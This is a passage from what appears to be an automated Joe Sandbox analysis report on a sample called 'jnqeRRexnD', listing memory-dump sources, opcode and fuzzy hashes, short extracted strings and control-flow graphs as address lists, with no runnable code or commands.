                                                                                                              • Instruction Fuzzy Hash: 69A1C272E04719CBCB658FB8CC952AEBBB5FF44320F10456DC946A7245EB349A42CB92
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (osq$4'sq
                                                                                                              • API String ID: 0-2651803416
                                                                                                              • Opcode ID: 3d265116eae05bed1afac1ecf6fb9cd3bb2ca60c28597265278af733f5ac470a
                                                                                                              • Instruction ID: 5b3d6366cf5e7300f247ac18f6fd764fc79e742fdd3d455f8cecdea1d5780b37
                                                                                                              • Opcode Fuzzy Hash: 3d265116eae05bed1afac1ecf6fb9cd3bb2ca60c28597265278af733f5ac470a
                                                                                                              • Instruction Fuzzy Hash: 41825D75600209DFCB15CFA8C984AAEBBBAFF88310F15855AE905EB366D734ED41CB50

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 2199 16669a0-16669e6 2200 1666fb1-166700c call 1667118 2199->2200 2201 16669ec-16669fa 2199->2201 2218 166700e-1667012 2200->2218 2219 166705c-1667060 2200->2219 2205 16669fc-1666a0d 2201->2205 2206 1666a28-1666a39 2201->2206 2205->2206 2220 1666a0f-1666a1b 2205->2220 2207 1666aaa-1666abe 2206->2207 2208 1666a3b-1666a3f 2206->2208 2346 1666ac1 call 16669a0 2207->2346 2347 1666ac1 call 1666fc8 2207->2347 2209 1666a41-1666a4d 2208->2209 2210 1666a5a-1666a63 2208->2210 2214 1666a53-1666a55 2209->2214 2215 1666ddb-1666e26 2209->2215 2216 1666d6c 2210->2216 2217 1666a69-1666a6c 2210->2217 2213 1666ac7-1666acd 2223 1666ad6-1666add 2213->2223 2224 1666acf-1666ad1 2213->2224 2225 1666d62-1666d69 2214->2225 2296 1666e2d-1666eac 2215->2296 2221 1666d71-1666dd4 2216->2221 2217->2216 2226 1666a72-1666a91 2217->2226 2227 1667014-1667019 2218->2227 2228 1667021-1667028 2218->2228 2229 1667077-166708b 2219->2229 2230 1667062-1667071 2219->2230 2220->2221 2222 1666a21-1666a23 2220->2222 2221->2215 2222->2225 2234 1666ae3-1666afa 2223->2234 2235 1666bcb-1666bdc 2223->2235 2224->2225 2226->2216 2263 1666a97-1666a9d 2226->2263 2227->2228 2237 16670fe-1667113 2228->2237 2238 166702e-1667035 2228->2238 2233 1667093-166709a 2229->2233 2342 166708d call 1669dd0 2229->2342 2343 166708d call 166a0e8 2229->2343 2344 166708d call 166a088 2229->2344 2231 1667073-1667075 2230->2231 2232 166709d-16670a7 2230->2232 2231->2233 2239 16670b1-16670b5 2232->2239 2240 16670a9-16670af 2232->2240 2234->2235 2253 1666b00-1666b0c 2234->2253 2256 1666c06-1666c0c 2235->2256 2257 1666bde-1666beb 2235->2257 2238->2219 2243 1667037-166703b 2238->2243 2245 16670bd-16670f7 2239->2245 2247 16670b7 2239->2247 2240->2245 2250 166703d-1667042 2243->2250 2251 166704a-1667051 2243->2251 2245->2237 2247->2245 2250->2251 2251->2237 2252 1667057-166705a 2251->2252 2252->2233 2260 1666bc4-1666bc6 2253->2260 2261 1666b12-1666b7e 2253->2261 2258 1666c27-1666c2d 2256->2258 2259 1666c0e-1666c1a 2256->2259 2257->2258 2274 1666bed-1666bf9 2257->2274 2267 1666c33-1666c50 2258->2267 2268 1666d5f 2258->2268 2265 1666ec3-1666f26 2259->2265 2266 1666c20-1666c22 2259->2266 2260->2225 2298 1666b80-1666baa 2261->2298 2299 1666bac-1666bc1 2261->2299 2263->2200 2270 1666aa3-1666aa7 2263->2270 2323 1666f2d-1666fac 2265->2323 2266->2225 2267->2216 2290 1666c56-1666c59 2267->2290 2268->2225 2270->2207 2276 1666eb1-1666ebc 2274->2276 2277 1666bff-1666c01 2274->2277 2276->2265 2277->2225 2290->2200 2294 1666c5f-1666c85 2290->2294 2294->2268 2305 1666c8b-1666c97 2294->2305 2298->2299 2299->2260 2309 1666c9d-1666d15 2305->2309 2310 1666d5b-1666d5d 2305->2310 2325 1666d17-1666d41 2309->2325 2326 1666d43-1666d58 2309->2326 2310->2225 2325->2326 2326->2310 2342->2233 2343->2233 2344->2233 2346->2213 2347->2213
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (osq$Hwq
                                                                                                              • API String ID: 0-1668724233
                                                                                                              • Opcode ID: 5b02245017a4d391031d90744d654dad803d0d515dca9e6b196de434a97f9688
                                                                                                              • Instruction ID: b7244b946f983c5cb9057e5f8a0ca784890ae0488a12338562284d6bd59ffeeb
                                                                                                              • Opcode Fuzzy Hash: 5b02245017a4d391031d90744d654dad803d0d515dca9e6b196de434a97f9688
                                                                                                              • Instruction Fuzzy Hash: DD126CB1A002199FDB14DF69D894BAEBBB6FF88300F108529E905EB355DF349D42CB90
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Xwq$Xwq
                                                                                                              • API String ID: 0-2617233878
                                                                                                              • Opcode ID: 067fce5f963fc87054fe2d03beab6939650c74b889dddf7e80918ee88e7e1db9
                                                                                                              • Instruction ID: 44e773c7efe3cf8745123ac85f7b51d773dfb2bfaab38876e1d89a31ba8fe487
                                                                                                              • Opcode Fuzzy Hash: 067fce5f963fc87054fe2d03beab6939650c74b889dddf7e80918ee88e7e1db9
                                                                                                              • Instruction Fuzzy Hash: 76510033B05751CBDB259B698C912BBBBBABB90210F44487ECC46C7345EB78C9028761
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4529745815.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_6db0000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ee742452c38f11acb6b6451e2ae311dd52b599378a55f1a8689d6f3063917ef4
                                                                                                              • Instruction ID: b1a490ae82ee2f47a6c0f735808e554c66d9bb6dc1759664b24eaec063b81298
                                                                                                              • Opcode Fuzzy Hash: ee742452c38f11acb6b6451e2ae311dd52b599378a55f1a8689d6f3063917ef4
                                                                                                              • Instruction Fuzzy Hash: D7F10474E01218CFDB54CFA9C894B9DBBB2BF89300F10D1A9E809AB355DB349986CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ef195823b80199972dbbb69f46427ed50d1362321812cf863ba1fecf52a1c55b
                                                                                                              • Instruction ID: f25e28b8a7e615054d252132fa5023555dee9268ee58c23facb538697733b26f
                                                                                                              • Opcode Fuzzy Hash: ef195823b80199972dbbb69f46427ed50d1362321812cf863ba1fecf52a1c55b
                                                                                                              • Instruction Fuzzy Hash: DB519574E00208DFDB18DFBAD894A9DBBB6FF88300F14902AE915AB364DB355842CF14
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3ff570f827fab9e99ff36a1ffe85198ba49432f36237e751b495393efe08baa9
                                                                                                              • Instruction ID: eb592b928ac5fea89b4d3c03a7d923ee97341bdd46ebcaaadcbc5d15dcdb2581
                                                                                                              • Opcode Fuzzy Hash: 3ff570f827fab9e99ff36a1ffe85198ba49432f36237e751b495393efe08baa9
                                                                                                              • Instruction Fuzzy Hash: 5B51A574E00208DFDB18DFFAD884A9DBBB2BF88300F24902AE915AB364DB355941CF14

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 16676f1-1667725 1 1667b54-1667b58 0->1 2 166772b-166774e 0->2 3 1667b71-1667b7f 1->3 4 1667b5a-1667b6e 1->4 11 1667754-1667761 2->11 12 16677fc-1667800 2->12 9 1667bf0-1667c05 3->9 10 1667b81-1667b96 3->10 20 1667c07-1667c0a 9->20 21 1667c0c-1667c19 9->21 22 1667b9d-1667baa 10->22 23 1667b98-1667b9b 10->23 26 1667763-166776e 11->26 27 1667770 11->27 13 1667802-1667810 12->13 14 1667848-1667851 12->14 13->14 34 1667812-166782d 13->34 17 1667c67 14->17 18 1667857-1667861 14->18 35 1667c6c-1667c9c 17->35 18->1 24 1667867-1667870 18->24 28 1667c1b-1667c56 20->28 21->28 29 1667bac-1667bed 22->29 23->29 32 1667872-1667877 24->32 33 166787f-166788b 24->33 36 1667772-1667774 26->36 27->36 77 1667c5d-1667c64 28->77 32->33 33->35 40 1667891-1667897 33->40 59 166782f-1667839 34->59 60 166783b 34->60 61 1667cb5-1667cbc 35->61 62 1667c9e-1667cb4 35->62 36->12 37 166777a-16677dc 36->37 89 16677e2-16677f9 37->89 90 16677de 37->90 43 1667b3e-1667b42 40->43 44 166789d-16678ad 40->44 43->17 48 1667b48-1667b4e 43->48 57 16678c1-16678c3 44->57 58 16678af-16678bf 44->58 48->1 48->24 63 16678c6-16678cc 57->63 58->63 64 166783d-166783f 59->64 60->64 63->43 70 16678d2-16678e1 63->70 64->14 71 1667841 64->71 72 16678e7 70->72 73 166798f-16679ba call 1667538 * 2 70->73 71->14 75 16678ea-16678fb 72->75 91 1667aa4-1667abe 73->91 92 16679c0-16679c4 73->92 75->35 80 1667901-1667913 75->80 80->35 82 1667919-1667931 80->82 145 1667933 call 16680d8 82->145 146 1667933 call 16680c9 82->146 85 1667939-1667949 85->43 88 166794f-1667952 85->88 93 1667954-166795a 88->93 94 166795c-166795f 88->94 89->12 90->89 91->1 114 1667ac4-1667ac8 91->114 92->43 96 16679ca-16679ce 92->96 93->94 97 1667965-1667968 93->97 94->17 94->97 99 16679f6-16679fc 96->99 100 16679d0-16679dd 96->100 101 1667970-1667973 97->101 102 166796a-166796e 97->102 103 1667a37-1667a3d 99->103 104 16679fe-1667a02 99->104 117 16679df-16679ea 100->117 118 16679ec 100->118 101->17 105 1667979-166797d 101->105 102->101 102->105 107 1667a3f-1667a43 103->107 108 1667a49-1667a4f 103->108 104->103 106 1667a04-1667a0d 104->106 105->17 111 1667983-1667989 105->111 112 1667a0f-1667a14 106->112 113 1667a1c-1667a32 106->113 107->77 107->108 115 1667a51-1667a55 108->115 116 1667a5b-1667a5d 108->116 111->73 111->75 112->113 113->43 119 1667b04-1667b08 114->119 120 1667aca-1667ad4 call 16663e0 114->120 115->43 115->116 121 1667a92-1667a94 116->121 122 1667a5f-1667a68 116->122 123 16679ee-16679f0 117->123 118->123 119->77 126 1667b0e-1667b12 119->126 120->119 134 1667ad6-1667aeb 120->134 121->43 124 1667a9a-1667aa1 121->124 129 1667a77-1667a8d 122->129 130 1667a6a-1667a6f 122->130 123->43 123->99 126->77 131 1667b18-1667b25 126->131 129->43 130->129 136 1667b27-1667b32 131->136 137 1667b34 131->137 134->119 142 1667aed-1667b02 134->142 139 1667b36-1667b38 136->139 137->139 139->43 139->77 142->1 142->119 145->85 146->85
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (osq$(osq$(osq$(osq$(osq$(osq$,wq$,wq
                                                                                                              • API String ID: 0-1935560061
                                                                                                              • Opcode ID: ed558b62ed33e3b2410f3afcd5e0ab07ab34c068f09a0185a4b5b23175b7ec82
                                                                                                              • Instruction ID: 09e34dbdc456d90e253dadb4f2799912b286bac56871d767e0bc895a28c3cd5f
                                                                                                              • Opcode Fuzzy Hash: ed558b62ed33e3b2410f3afcd5e0ab07ab34c068f09a0185a4b5b23175b7ec82
                                                                                                              • Instruction Fuzzy Hash: 71124930A00209DFDB15DF69D884AAEBBF6FF88318F158569E9459B361DB30ED41CB90
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Hwq$Hwq
                                                                                                              • API String ID: 0-741242263
                                                                                                              • Opcode ID: 1f155b16c7e0aab6513470a91ac31e242f1068de52069f7d13858c47cdb421d2
                                                                                                              • Instruction ID: d9b0238de100a56580efa07af9c090381a5523ae64802d73dfc7b90b8c13404f
                                                                                                              • Opcode Fuzzy Hash: 1f155b16c7e0aab6513470a91ac31e242f1068de52069f7d13858c47cdb421d2
                                                                                                              • Instruction Fuzzy Hash: 5A91AF713042459FDB16AF69DC54B6EBBB6AF88340F048469E506CB39ADF38DC42CB91
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ,wq$,wq
                                                                                                              • API String ID: 0-1895925779
                                                                                                              • Opcode ID: 5b6c296c8bbce70684aed87ca298beb70f8c9a0d5562fa2ca8b0e13082092f33
                                                                                                              • Instruction ID: 67f2b25a3729bb88ac79dcaf3f89624cf7f648579917a23e0d652e59b6185854
                                                                                                              • Opcode Fuzzy Hash: 5b6c296c8bbce70684aed87ca298beb70f8c9a0d5562fa2ca8b0e13082092f33
                                                                                                              • Instruction Fuzzy Hash: A581AB70B00515DFCB14DF6DEC84A6ABBBAFF88214B148169D506EB365DB31EC41CBA2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (osq$(osq
                                                                                                              • API String ID: 0-4199119687
                                                                                                              • Opcode ID: 1b7c7aa12cb7956521c83a59f172a7067449a227e4f33b92d25ea6b6cbf0f6d0
                                                                                                              • Instruction ID: eba3f979bb94c206a4c1b39f8164855643415e772c09b46c601088c925c7117a
                                                                                                              • Opcode Fuzzy Hash: 1b7c7aa12cb7956521c83a59f172a7067449a227e4f33b92d25ea6b6cbf0f6d0
                                                                                                              • Instruction Fuzzy Hash: 93617F71B001099FCB04EB69CC54AAEBBBABFC8211F148569E615D73A5DB359D02CB90
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'sq$4'sq
                                                                                                              • API String ID: 0-780347173
                                                                                                              • Opcode ID: dcf9e6147838ca924b46d421604505e99938467476ee58f2b10a305127429393
                                                                                                              • Instruction ID: c760b9cccc048d26cde9515022701d7806c5bd535ba3fff8a5c7312733212d79
                                                                                                              • Opcode Fuzzy Hash: dcf9e6147838ca924b46d421604505e99938467476ee58f2b10a305127429393
                                                                                                              • Instruction Fuzzy Hash: E5518D327002059FDB01DB69CC44B6EBBEAEB89358F448476E909CB35ADB71DC42C7A1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $sq$$sq
                                                                                                              • API String ID: 0-1184984226
                                                                                                              • Opcode ID: 48f8d814aec983f68244e2335757374581c1160e3d5cd0ec1a460fe484d0cd17
                                                                                                              • Instruction ID: 4c14f94701d3adb6f61198861fe1cb407d2d57bcd28d1a20104567e0162c1f88
                                                                                                              • Opcode Fuzzy Hash: 48f8d814aec983f68244e2335757374581c1160e3d5cd0ec1a460fe484d0cd17
                                                                                                              • Instruction Fuzzy Hash: FA318F703042118FDB269B3DDC94A2E7B6EBB84790B14446AF212CB396DF38CC81C755
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LRsq
                                                                                                              • API String ID: 0-3165563352
                                                                                                              • Opcode ID: df8ac779cd1171b079afa3ee51e3767bb72701feff3bcd1270ddca057e0ce644
                                                                                                              • Instruction ID: 153634eb58e6a1b46bbd8d6233e5bd839cea5c7205db69796ff77c105a7632f1
                                                                                                              • Opcode Fuzzy Hash: df8ac779cd1171b079afa3ee51e3767bb72701feff3bcd1270ddca057e0ce644
                                                                                                              • Instruction Fuzzy Hash: 8052D874A01219DFCB55DF24E994A9DBBB2FB48301F1085A9E40AB7358DF386E85CF81
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LRsq
                                                                                                              • API String ID: 0-3165563352
                                                                                                              • Opcode ID: bda8e0aff31e55cb6df4752b223e4d7c18b3d3b4896d1e621f336e3e65dc2124
                                                                                                              • Instruction ID: 9265395df557b5816b45a26265b682d483abafc91b1ad4e424e50066270f2b7a
                                                                                                              • Opcode Fuzzy Hash: bda8e0aff31e55cb6df4752b223e4d7c18b3d3b4896d1e621f336e3e65dc2124
                                                                                                              • Instruction Fuzzy Hash: EE52C874A01219DFCB54DF64E994A9DBBB2FB48301F1085A9E40AB7358DF385E85CF81
                                                                                                              APIs
                                                                                                              • LdrInitializeThunk.NTDLL(00000000), ref: 06DB9A6E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4529745815.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_6db0000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 2c8421e70febf27e40dc2fbd4af863b127319cfed744140f80c24c63c9adc0f9
                                                                                                              • Instruction ID: e2e1b5814a7249066b56df739339485137150a435037bf192719d5ba00a2133a
                                                                                                              • Opcode Fuzzy Hash: 2c8421e70febf27e40dc2fbd4af863b127319cfed744140f80c24c63c9adc0f9
                                                                                                              • Instruction Fuzzy Hash: 89119A74E00149CFDB44CBE8C894EEDBBF5FB89314F10A128E905AB209D730E981CB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9285705e2dbc949418df849428435f4576f5451d739eed103f901620114d4ccd
                                                                                                              • Instruction ID: fbe6be01a8e8aece619b3c8eb9954b529b220b031f2806dbbc0c1e567965c375
                                                                                                              • Opcode Fuzzy Hash: 9285705e2dbc949418df849428435f4576f5451d739eed103f901620114d4ccd
                                                                                                              • Instruction Fuzzy Hash: 1E1287380267438FE6503B24F6BC16B7A64FF4F3A3704BC15E10B8844DAB79148ACE66
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0552689925c92f7151d7250f10a0d0e2cd11971127e6301d2622c8231ffcedd7
                                                                                                              • Instruction ID: 879157968c48c0d1fa20de03afbad5eb0fbd6ef4c71697481abc5ac60aef790d
                                                                                                              • Opcode Fuzzy Hash: 0552689925c92f7151d7250f10a0d0e2cd11971127e6301d2622c8231ffcedd7
                                                                                                              • Instruction Fuzzy Hash: E31286380227538FE6503B24F6BC12B7A65FF4F3A3704BD15E10B8844DAB79148ACE66
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0dba25fce5b48cfadc0d2825581f07a07dc78fb46bbfdd4264debdb3b62b10e1
                                                                                                              • Instruction ID: a7f42f6d485cf07d8a3de70d933bc4ceeb117ba2a01e98e3bb19dabe6dd09a32
                                                                                                              • Opcode Fuzzy Hash: 0dba25fce5b48cfadc0d2825581f07a07dc78fb46bbfdd4264debdb3b62b10e1
                                                                                                              • Instruction Fuzzy Hash: A8810F316016059FCB11CF2CCC80AAEBBEAEF85328B55C666DD1897359C731F956CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 06d0d2ea7610e9f0d4bc9c6ddee95aecfa4ef01ab3d8be2fdd9e158e1f90cadb
                                                                                                              • Instruction ID: 8c10825a353b1b15bb0d918468c5447920d00c133dc84b41a5f66ee670431d9b
                                                                                                              • Opcode Fuzzy Hash: 06d0d2ea7610e9f0d4bc9c6ddee95aecfa4ef01ab3d8be2fdd9e158e1f90cadb
                                                                                                              • Instruction Fuzzy Hash: 087126347006068FDB15DF7CC898A6A7BEEAF89205B1980A9E906DB371DB74DC41CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e4029c8eb1a442cee64e44b89c64d1c61043e0ac155838fa5c691bbc0c519660
                                                                                                              • Instruction ID: 1374a174a4c4da038098148e14a1e284d1de2100a91da4a789b9d5fa373dba5e
                                                                                                              • Opcode Fuzzy Hash: e4029c8eb1a442cee64e44b89c64d1c61043e0ac155838fa5c691bbc0c519660
                                                                                                              • Instruction Fuzzy Hash: 4E51F074E0121CDFDB14DFA5D894AAEBBB2FF88300F208529D905AB354EB396946CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 48ba35c2295ee1f0db96bb2767b20bcc8ad8c7eb2b9f00302fd3f0f986687381
                                                                                                              • Instruction ID: c2904d20bf7692d7b3cfd00f3cacd9a18e1fc5019f4a165dbcac986e321181ab
                                                                                                              • Opcode Fuzzy Hash: 48ba35c2295ee1f0db96bb2767b20bcc8ad8c7eb2b9f00302fd3f0f986687381
                                                                                                              • Instruction Fuzzy Hash: BC518374E012189FDB58DFA9D99499DFBF2BF89300F248169E819AB364DB31A805CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9c337621123b5c68667a298fe09825849e68776b63dc7e1bd90643c00110984e
                                                                                                              • Instruction ID: 4fc61a8242ef692d86966a1b34e49370e1e6cf771951dbeab43f5bec9c52adc9
                                                                                                              • Opcode Fuzzy Hash: 9c337621123b5c68667a298fe09825849e68776b63dc7e1bd90643c00110984e
                                                                                                              • Instruction Fuzzy Hash: 8B517F74E01208DFCB48DFA9D99499DBBB6FF89300B209469E815BB324DB35AD42CF54
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 36c18070b1a96652a833356f625d2b69944d6c130e06f8ceebcecbaeba3c9eb8
                                                                                                              • Instruction ID: 768645f23a3cffaae2190f7aeebd034684d617c0b1ab7a851b5757371dcdf1f2
                                                                                                              • Opcode Fuzzy Hash: 36c18070b1a96652a833356f625d2b69944d6c130e06f8ceebcecbaeba3c9eb8
                                                                                                              • Instruction Fuzzy Hash: A3417831A00249DFCF16CFA9CC48AAEBFBAAF49350F048555E905FB296D375E914CB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b0c89f7b142ddad00e92de501dcd594bce2acb99e867cc7c52894764711b7da0
                                                                                                              • Instruction ID: 0221c9f294b4f059fc0d4fd4825a1e5dcf492610ce2354023547f248fb325ddd
                                                                                                              • Opcode Fuzzy Hash: b0c89f7b142ddad00e92de501dcd594bce2acb99e867cc7c52894764711b7da0
                                                                                                              • Instruction Fuzzy Hash: C741E1B1A04248DFCB11CF68CC44B6EBBB6EB44304F04846EE815DB252DB79DD45CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
